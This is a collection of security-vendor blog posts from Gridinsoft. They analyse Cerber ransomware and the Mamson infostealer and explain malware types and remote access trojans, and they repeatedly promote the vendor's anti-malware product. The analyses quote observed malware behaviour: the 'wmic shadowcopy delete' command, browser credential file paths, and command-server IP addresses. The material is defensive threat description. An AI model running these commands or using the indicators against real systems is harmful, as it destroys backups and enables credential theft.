Let’s examine how Trojan:Win32/Cerber behaves using a real-world example. As a sample, let’s take one representative of this malware family. This file masquerades as an IObit utility, and even has all the file data rows filled with correct information.

Upon infiltrating the system, the malware performs specific checks to ensure it’s not running in a virtual environment. The next step involves checking the location of the current system to avoid infecting specific regions.

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\WMIC.exe
\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows\System

To place its files, Cerber Trojan uses system temporary folders, particularly AppData\Local\Temp. Upon execution, the malware creates its copy in the said folder, and directs all the persistence hooks towards this file. Then, the original sample deletes itself, covering the tracks, and requests the system reboot. This looks as a rather organic maneuver considering that the cover for the reviewed sample is a system tuning utility.

Execution

After conducting its checks, the malware begins its primary task: encrypting data. It utilizes legitimate Windows tools, such as the command prompt, to automate actions and conceal traces. It performs the following processes:

C:\Users\\AppData\Local\Temp\Ahpdate.exe
C:\Windows\System32\taskkill.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\System32\schtasks.exe

The first command executes the executable file located in the temporary folder. Then, there are system commands aimed at terminating active processes (such as antivirus software), adding the malware to the Windows scheduler, and initiating certain functions.

Like any ransomware, Cerber invariably deletes shadow copies. This is done to maximize the difficulty of file restoration. To achieve this, the malware executes the following commands:

IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ShadowCopy
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\system32\vssvc.exe
C:\Windows\system32\wbem\wmic.exe shadowcopy delete

In short, Cerber requests access to all objects from the Win32_ShadowCopy class (information about all existing shadow copies) and then proceeds to delete them.

Is Trojan:Win32/Cerber False Positive?

In most cases, such detections are true, but there are rare instances when Trojan:Win32/Cerber may be a false positive. Surprisingly, this flag pops up to game files installed via Steam or other official platforms. It may happen because the endpoint code of the file may coincide with the endpoint code of typical virus endpoints. Typically, when this happens with a legitimate file, updating the signature databases to the latest version resolves the issue.

However, as for mods, add-ons, and game hacks, the situation is different. In this case, the likelihood of getting the Trojan:Win32/Cerber is much higher. While the first two options are developed by third-party developers and may be distributed through third-party websites, the last one generally illegal. Embedding malware into hacks, cheats, and game cracks is a common practice among malicious actors.

How To Remove Trojan:Win32/Cerber?

To completely remove Trojan:Win32/Cerber, it’s essential to utilize an advanced anti-malware solution. However, more importantly, this malware should neutralize ransomware during the download stage. Otherwise, it will execute its irreversible actions. I recommend GridinSoft Anti-Malware because its engine can detect most threats, and its Internet Security module blocks potentially malicious websites, significantly reducing the attack vector.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Cerber appeared first on Gridinsoft Blog.

Malware vs Virus – Is There Any Difference?

The terms malware and virus are often used interchangeably, but technically, they are not the same thing. In a nutshell, malware is a collective term for any type of malicious software, regardless of how it works, its purpose, or how it is distributed. A computer virus, on the other hand, is just one type of malware. Computer viruses have been around almost since the beginning of the Internet: the first self-replicating virus appeared in 1971. Although it did no damage, simply displaying the “I’M THE CREEPER. CATCH ME IF YOU CAN!” text on the screen, it can technically be considered a virus.

So, all the difference boils down to all viruses being malware, but not all malware being viruses. It’s like calling all copy machines “Xerox” or all portable audio players “Walkman”. Moreover, in addition to the virus category, there are other categories of malware, which in turn are divided into subcategories. We are talking about such categories as worms, trojan horses, rootkits, stealers, spyware, ransomware, adware, etc. Now, we will take a closer look at all of them.

What is Malware?

Malware stands for malicious software, one that aims at damaging the system, files in it, or uploading these files to a remote server. The range and history of malicious software is vast, with changes happening almost every day. Nowadays, malicious software aims almost exclusively at earning money in this or another form. As a result, some analysts classify modern malware as crimeware. Let’s see some of the most widely used malware types.

This is not a complete list of threats, but the most widespread malware types. Some of the modern malware samples can possess functions typical for other malware types. For example, a dropper can collect user data, akin to an infostealer, or adware may act as a loader.

What is Virus?

A computer virus is a type of malicious software. While there are many variations of viruses, they all share the ability to spread through self-replication. Victims activate viruses by opening infected applications or files. Viruses are commonly spread through web applications, software, and email. They can also be transmitted via infected websites, content downloads, and removable media.

The term “virus” has become synonymous with malware due to historical reasons, propagation methods, media popularization, and the broadening of the term to encompass various types of malicious software. Computer viruses have existed since the early days of computing, but “real” viruses began to emerge in the 1980s. The earliest canonical virus is considered to be the Elk Cloner, created in 1982 by high school student Rich Skrenta. It infected Apple II computers and spread via floppy disks. Though harmless, it was the first to spread beyond a single computer system.

Malware and Virus Examples

To summarize, let’s review a real representative of threats. Here, I have gathered the most prominent examples of different types of threats, along with their properties and their impact on cyberspace:

ILOVEYOU

The ILOVEYOU virus, an email worm, was released in 2000 by two Filipino college students. It quickly spread worldwide through email attachments, deceiving users into opening them. Once opened, the virus overwrote essential system files, leading to computer crashes and data loss. Additionally, it automatically sent copies of itself to every contact in the user’s address book. The global damages caused by this virus were estimated to be around $15 billion.

Emotet

The Emotet Banking Trojan, originating in 2014, was initially developed to steal banking credentials. However, it evolved into a highly modular and sophisticated malware capable of delivering various payloads. It primarily spread through spam emails and quickly became one of the most prevalent and costly forms of malware. Emotet was frequently utilized to distribute ransomware and other malicious software.

WannaCry

The WannaCry Ransomware attack of 2017 exploited a vulnerability in Windows systems to encrypt files and demanded ransom payments in Bitcoin for decryption. It spread rapidly across networks using the SMB protocol, infecting over 230,000 computers in 150 countries. The attack caused widespread disruption, notably affecting the UK’s National Health Service (NHS).

How to Protect Against Malware and Viruses?

To safeguard against malware and viruses, it’s crucial to employ a robust, advanced anti-malware solution. As the cyber threat landscape evolves, so do anti-malware developers. Today, there are numerous high-quality products available, including GridinSoft Anti-Malware. In addition to its primary protection features, it includes an Internet Security module, which has become more of a necessity than an optional add-on. Given that the majority of malware is now propagated via the Internet, I strongly advise utilizing Internet Security for enhanced protection.

Equally important is exercising vigilance while browsing the web. Practicing good cyber hygiene is paramount, which means refraining from clicking on suspicious links or opening email attachments from unknown senders. Adhering to these fundamental rules can significantly decrease the likelihood of falling victim to any of the aforementioned threats.

The post Malware vs Virus appeared first on Gridinsoft Blog.

Trojan:Win32/Mamson.A!ac Overview

Trojan:Win32/Mamson.A!ac is a Microsoft Defender detection that flags infostealer malware. This type of malicious program aims at collecting data from the infected system. Usually, it gathers login credentials from browser files, cookies, browser history, and other information about the victim’s Internet activity. In some cases, samples of RedLine Stealer appear under this detection. Still, the effect is exactly the same.

Mamson Trojan often spreads under the guise of helpful utilities downloaded from shady websites, including These places have ideal conditions for malware distribution, as most hacked software requires mandatory disabling of antivirus software during installation. In certain cases, it may hide in the installer.

Technical Analysis

Let’s analyze Trojan:Win32/Mamson.A!ac by tearing down one of its samples. Since this detection is generic, there could be rather wild variations in certain areas, but the “mainstream” functionality remains the same.

Once Mamson enters the system, it checks for the virtual environment, debugging, or sandboxing. For this, It checks the following values in the registry:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft/Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Display

These keys keep info about the OS version, language packs, and display settings. Such data is useful both for fingerprinting and to determine whether the environment has anything synthetic about it.

Privilege Escalation

After the first steps, the malware escalates privileges, which gives it a foothold in the system. To begin with, it manipulates the Windows Error Reporting system to legitimize itself.

%windir%\system32\wbem\wmiprvse.exe
%windir%\System32\svchost.exe -k WerSvcGroup
%windir%\system32\WerFault.exe -u -p 2660 -s 684

Further, it creates its own service, by executing a command to the Service Control Manager. This makes Mamson much harder to remove manually, as services protect its underlying files. Attempting to remove it anyways after such a trick will likely result in BSOD, unless the antimalware software is used.

C:\Windows\system32\sc.exe start w32time task_started

Defence Evasion

To avoid detection, Mamson comes in a packed (encrypted) form that allows it to avoid static detection. In order to legitimize itself, the malware plays with registry keys of Identity Client Runtime Library (IdentityCRL). Some of the values are also used to keep malware configurations.

HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\001880060ADF5C62
HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Immersive\production\Property\00188006102E98CE

To cover the tracks, this malware also manipulates the logs of Windows Error Reporting system. It edits out lines of the logs that contain the information about the WerFault interactions that I’ve mentioned above.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_executable.exe_515752de8867334bf1b5dff986a385cbabdecb_6ccb0f67_0f5f9b13\Report.wer
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1FF4.tmp.dmp

Data Collection

Mamson infostealer has primary goal is to collect sensitive information. Upon finishing preparations, the malware starts with creating a folder at C:\Users\[USER]/Downloads\cp and copying data from C:\Users\[USER]\AppData\Google\Chrome\User Data\Default\Login Data. That folder keeps a wide range of information about user’s credentials and session tokens. It also collects the following data:

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys\de7cf8a7901d2ad13e5c67c29e5d1662_cbbb49d6-b7ff-44ca-aba5-8a5e250d4d42
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\c74ecc55-989d-484d-a8fe-47bdfda57159
C:\Windows/System32\spp/store\2.0\cache\cache.dat.

Additionally, Mamson accesses cryptocurrency apps and wallets in order to harvest credentials. I did not have a spare crypto wallet to sacrifice for the test, so there were no corresponding logs. Once the data collection is complete, the malware sends it to one of the command servers. Their IP addresses are built into the malware sample:

23.216.147.76:443
23.216.147.64:443
104.86.182.8:443

How To Remove Trojan:Win32/Mamson.A!ac?

To remove Trojan:Win32/Mamson.A!ac you will need a scan with GridinSoft Anti-Malware. Since the malware primarily targets Windows’ built-in defenses, they may be disabled or not working correctly. With GridinSoft Anti-Malware, you will be sure that the malware is completely gone. Run a Full scan to check the entire system and remove even the most covert threats.

The post Trojan:Win32/Mamson.A!ac appeared first on Gridinsoft Blog.

What is a Remote Access Trojan (RAT)?

A Remote Access Trojan (RAT) is a malicious program that opens a backdoor, allowing an attacker to control the victim’s device completely. Users often download RATs with a legitimate program, i.e., inside of hacked games from torrents or within an email attachment. Once an attacker compromises the host system, it can use it to spread RATs to additional vulnerable computers, thus creating a botnet. In addition, RAT can be deployed as a payload using exploit kits. Once successfully deployed, RAT directly connects to the command-and-control (C&C) server the attackers control. They achieve this by using a predefined open TCP port on the compromised device. Because the RAT provides administrator-level access, an attacker can do almost anything on a victim’s computer, such as:

• Use spyware and keyloggers to track the victim’s behavior
• Gain access to sensitive data, including social security numbers and credit card information
• View and record video from a webcam and microphone
• Take screenshots
• Format disks
• Download, change or delete files
• Distribute malware and viruses

How does a Remote Access Trojan work?

Like any other type of malware, a RAT can be attached to an email or posted on a malicious website. Cybercriminals can also exploit a vulnerability in a system or program. RAT is similar to Remote Desktop Protocol (RDP) or Anydesk but differs in its stealth. RAT establishes a command and control (C2) channel with the attacker’s server. This way, attackers can send commands to RAT, and it can return the data. RATs also have a set of built-in controls and methods for hiding their C2 traffic from detection.

RATs can be combined with additional modules, providing other capabilities. For example, suppose an attacker may gain a foothold using a RAT. Then, after examining the infected system with the RAT, he decides he needs to install a keylogger. Depending on his needs, RAT may have a built-in keylogging feature or the ability to download and add a keylogger module. It can also load and run an independent keylogger.

Why Remote Access Trojan is Dangerous?

A 2015 incident in Ukraine illustrates the nefarious nature of RAT programs. At the time, attackers used remote-control malware to cut power to 80,000 people. As a result, they gained remote access to a computer authenticated in the SCADA (supervisory control and data collection) machines that controlled the country’s utility infrastructure. In addition, Remote Access Trojan allowed attackers to access sensitive resources by bypassing the elevated privileges of the authenticated user on the network. Thus, an attack using RATs can take on a threatening scale, up to the threat to national security.

Unfortunately, cybersecurity teams often have difficulty detecting RATs. This is because malware typically carries many concealing features, allowing it to avoid any detection. In addition, RATs manage resource utilization levels so that there is no performance degradation, making it difficult to detect the threat.

Ways of using Remote Access Trojan

The following are ways in which a RAT attack can compromise individual users, organizations, or even entire populations:

• Spying and blackmail: An attacker who has deployed a RAT on a user’s device gains access to the user’s cameras and microphones. Consequently, he can take pictures of the user and his surroundings and then use this to launch more sophisticated attacks or blackmail.
• Launch Distributed Denial of Service (DDoS) Attacks: Attackers install RATs on many user devices, then use those devices to flood the target server with spoofed traffic. Even though the attack can cause network performance degradation, users are often unaware that hackers use their devices for DDoS attacks.
• Cryptomining: In some cases, attackers can use RATs to mine cryptocurrency on the victim’s computer. By scaling this action to many devices, they can make huge profits.

Remote file storage: Sometimes attackers can use RATs to store illegal content on unsuspecting victims’ machines. That way, authorities can’t shut down the attacker’s account or storage server because he keeps information on devices belonging to legitimate users.

• Industrial Systems Compromise: As described above, attackers can use RATs to gain control over large industrial systems. These could be utilities such as electricity and water supplies. As a result, an attacker can cause significant damage to the industrial equipment by sabotaging these systems and disrupting critical services in entire areas.

Remote Access Trojan Examples

njRAT

NjRAT is probably the most known and the oldest among remote-access trojans. Appeared in 2012, it keeps getting updates, which adjust its functionality to the modern “standards”, which makes up for its longevity. The reason for this is probably the attention from state-sponsored threat actors – APT36 and APT41 – who use it in cyberattacks almost since its very inception.

Key functionality of njRAT is typical for pretty much any remote-access trojan – it is about providing remote access. The latter is topped up with uploading and downloading files by command, log keystrokes and capture microphone and camera inputs. Some of its variants are also capable of grabbing credentials from browsers and cryptocurrency apps.

One interesting feature of this remote access trojan is its naming. Threat analysts use its original name interchangeably with Bladabindi. The latter is a detection name that Microsoft assigned to this trojan back in its early days. Usually, Redmond changes the naming as the malware gains volume and power, but this did not happen here.

Sakula

Sakula is seemingly harmless software with a legitimate digital signature. However, the malware first appeared in 2012 and is used against high-level targets. It allows attackers to take full advantage of remote administration on the device and uses simple unencrypted HTTP requests to communicate with the C&C server. Additionally, it uses a Mimikatz password stealer to authenticate using a hash transfer method that reuses operating system authentication hashes to hijack existing sessions.

KjW0rm

KjW0rm is a worm written in VBS in 2014 that uses obfuscation, making it difficult to detect on Windows computers. It has many variations; the older parent version is called “Njw0rm”. The malware and all other variants belong to the same family, with many features and similarities in its workflow. It deploys stealthily and then opens a backdoor that allows attackers to gain complete control of the machine and send data back to the C&C server.

Havex

Havex is a Remote Access Trojan discovered in 2013 as part of a large-scale spying campaign targeting production control systems (ICS) used in many industries. Its author is a hacker group known as Dragonfly and Energetic Bear. It gives attackers complete control over industrial equipment. Havex uses several mutations to avoid detection and has a minimal footprint on the victim’s device. It communicates with the C&C server via HTTP and HTTPS protocols.

Agent.BTZ/ComRat

Agent.BTZ/ComRat (also called Uroburos) is a Remote Access Trojan that became infamous after hackers used it to break into the U.S. military in 2008. The first version of this malware was probably released in 2007 and had worm-like properties, spreading via removable media. From 2007 to 2012, developers released two significant versions of RAT. Most likely, this is a development of the Russian government. It can be deployed via phishing attacks and uses encryption, anti-analysis, and forensic techniques to avoid detection. In addition, it provides complete administrative control over the infected machine and can transmit data back to its C&C server.

Dark Comet

Backdoor.DarkComet is a Remote Access Trojan application that runs in the background and stealthily collects information about the system, connected users, and network activity. This Remote Access Trojan was first identified in 2011 and is still actively used today. It provides complete administrative control over infected devices. For example, it can disable task manager, firewall, or user access control (UAC) on Windows machines. In addition, Dark Comet uses encryption, thereby avoiding detection by antivirus.

AlienSpy

AlienSpy is a RAT that supports multiple platforms. This allows payload creation for Windows, Linux, Mac OS X, and Android operating systems. It can collect information about the target system, activate the webcam, and securely connect to the C&C server, providing complete control over the device. In addition, AlienSpy uses anti-analysis techniques to detect the presence of virtual machines. According to the researcher who analyzed the threat, the operator behind the author of the service is a native Spanish speaker, probably Mexican.

Heseber BOT

The Heseber BOT is based on the traditional VNC remote access tool. It uses VNC to remotely control the target device and transfer data to the C&C server. However, it does not provide administrative access to the machine unless the user has such permissions. Since VNC is a legitimate tool, Haseber antivirus tools do not identify it as a threat.

Sub7

Sub7 is a Remote Access Trojan that runs on a client-server model. The backdoor was first discovered in May 1999 and ran on Windows 9x and the Windows NT family of operating systems up to Windows 8.1. The server is a component deployed on the victim machine, and the client is the attacker’s GUI to control the remote system. The server tries to install itself into a Windows directory and, once deployed, provides webcam capture, port redirection, chat, and an easy-to-use registry editor.

Back Orifice

Back Orifice is a Remote Access Trojan for Windows introduced in 1998. It supports most versions beginning with Windows 95 and is deployed as a server on the target device. It takes up little space, has a GUI client, and allows an attacker to gain complete control over the system. RAT can also use image processing techniques to control multiple computers simultaneously. The server communicates with its client via TCP or UDP, usually using port 31337.

How To Protect Against Remote Access Trojan?

As stated above, Remote Access Trojans rely on their stealthiness. Once it has appeared, you will likely struggle to detect it, even if the exact malware sample is not new. That’s why the best way to protect against Remote Access Trojan is to not even give it a chance to run. The following methods represent proactive actions that severely decrease the chance of malware introduction and the possibility of getting in trouble.

Security training

Unfortunately, the weakest link in any defense is the human element, which is the root cause of most security incidents, and RATs are no exception. Therefore, it’s strategy for defending against RATs depends on organization-wide security training. In addition, victims usually launch this malware through infected attachments and links in phishing campaigns. Therefore, employees must be vigilant not to contaminate the company network and jeopardize the entire organization accidentally.

Using multi-factor authentication (MFA)

Since RATs typically try to steal passwords and usernames for online accounts, using MFA can minimize the consequences if a person’s credentials are compromised. The main advantage of MFA is that it provides additional layers of security and reduces the likelihood that a consumer’s identity will be compromised. For example, suppose one factor, such as the user’s password, is stolen or compromised. In that case, the other factors provide an additional layer of security.

Strict access control procedures

Attackers can use RATs to compromise administrator credentials and gain access to valuable data on the organization’s network. However, with strict access controls, you can limit the consequences of compromised credentials. More stringent rules include:

• More strict firewall settings
• Safelisting IP addresses for authorized users
• Using more advanced antivirus solutions

Solutions for secure remote access

Every new endpoint connected to your network is a potential RAT compromise opportunity for attackers. Therefore, to minimize the attack surface, it’s important to only allow remote access through secure connections established through VPNs or security gateways. You can also use a clientless solution for remote access. It does not require additional plug-ins or software on end-user devices, as these devices are also targets for attackers.

Zero-trust security technologies

Recently, zero-trust security models have grown in popularity because they adhere to the “never trust, always verify” principle. Consequently, the zero-trust security approach offers precise control over lateral movements instead of full network access. It is critical to suppressing RAT attacks, as attackers use lateral moves to infect other systems and access sensitive data.

Focus on infection vectors

Like other malware, Remote Access Trojan is a threat only if installed and implemented on the target computer. Using secure browsing, anti-phishing solutions, and constantly patching systems can minimize the likelihood of RAT. Overall, these actions are a good tone for improving security for any case, not only against Remote Access Trojans.

Pay attention to abnormal behavior

RATs are Trojans that may present themselves as legitimate applications but contain malicious features associated with the actual application. Tracking the application and system for abnormal behavior can help identify signs that might indicate a Remote Access Trojan.

Monitoring network traffic

An attacker uses RATs to remotely control an infected computer over the network. Consequently, a RAT deployed on a local device communicates with a remote C&C server. Therefore, you should pay attention to unusual network traffic associated with such messages. In addition, it would be best to use tools such as web application firewalls to monitor and block C&C messages.

Implement least privilege

The concept of least privilege implies that applications, users, systems, etc., should be restricted to the permissions and access they need to do their jobs. Therefore, using the least privilege can help limit an attacker’s actions with RAT.

Are Remote Access Trojans illegal?

Well, yes, but actually, no. It all depends on how and what you use it for. It is not the program itself that makes such tasks illegal. It’s the implementation. You can test and execute if you’ve written a Remote Access Trojan and have a home lab. You can use it if you have written permission from the other party. However, if you use the RAT maliciously, you may face some legal problems. So, to distinguish, professionals use the term “remote access tools” for legitimate access and control and “remote access trojan” for illegitimate access and control.

The post Remote Access Trojan (RAT) appeared first on Gridinsoft Blog.